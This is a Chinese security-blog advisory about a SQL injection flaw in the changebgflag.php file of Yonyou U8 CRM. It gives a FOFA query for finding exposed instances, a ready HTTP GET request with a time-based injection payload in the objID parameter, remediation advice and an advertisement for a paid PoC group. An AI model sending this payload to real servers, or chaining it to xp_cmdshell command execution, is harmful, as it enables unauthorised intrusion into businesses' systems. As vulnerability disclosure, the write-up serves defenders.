文章总结： 文档分析用友U8CRM系统changebgflag.php文件存在的SQL注入漏洞，攻击者可通过构造恶意参数利用该漏洞配合数据库xp_cmdshell执行任意命令控制服务器。漏洞利用难度低，提供具体复现步骤与检测工具，建议通过关闭互联网暴露面或升级至安全版本进行修复。 综合评分： 75 文章分类： 漏洞分析,WEB安全,漏洞预警,解决方案,应急响应

用友U8CRM-changebgflag-sql注入漏洞

原创

北雪网络安全 北雪网络安全

北雪网络安全

2026年5月2日 10:11 山东

在小说阅读器读本章

去阅读

本文章所描述的内容仅供网络安全学习使用，任何人不允许学到技术内容进行非法系统测试，作者不对任何学习文章并进行非法操作的行为负责，由本人自己承担后果，本文章仅供技术学习。

01

更多内容

网络安全学习知识库每日添加最新漏洞并提供python与 nuclei 批量探测脚本：https://pc.fenchuan8.com/#/index?forum=110296

02

搜索引擎

Fofa：app=”用友U8CRM”

03

漏洞复现

漏洞概述：用友U8 CRM changebgflag.php文件存在SQL注入漏洞，攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。经过分析与研判，该漏洞利用难度低，建议尽快修复。

GET /service/changebgflag.php?UserSessionID=bgsesstimeout-&objType=1&StopBgFlag=1&objID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1Host:Accept-Language:zh-CN,zh;q=0.9Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/144.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding:gzip, deflate

04

自查工具

05

修复建议

1、关闭互联网暴露面或接口设置访问权限

2、升级至安全版本

06

内部圈子

🛠️ 【知名漏洞实战圈，纯干货】🛠️

还在找公开漏洞POC而烦恼？还在为漏洞不会验证而发愁？还在为发现不了漏洞而自卑？这里漏洞圈子解决你的困惑！ 目前已更新poc数量2500+

🎯 适用场景

▫️渗透测试▫️企业漏洞自查▫️攻防演练▫️安全服务▫️合规运营****

⚠️ 重要声明：

▫️仅限合法授权测试，严禁违规使用

▫️虚拟资源服务，购买后不接受任何形式退款

        ▫️付款前请评估需求，慎重考虑

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：北雪网络安全 北雪网络安全 北雪网络安全《用友U8CRM-changebgflag-sql注入漏洞》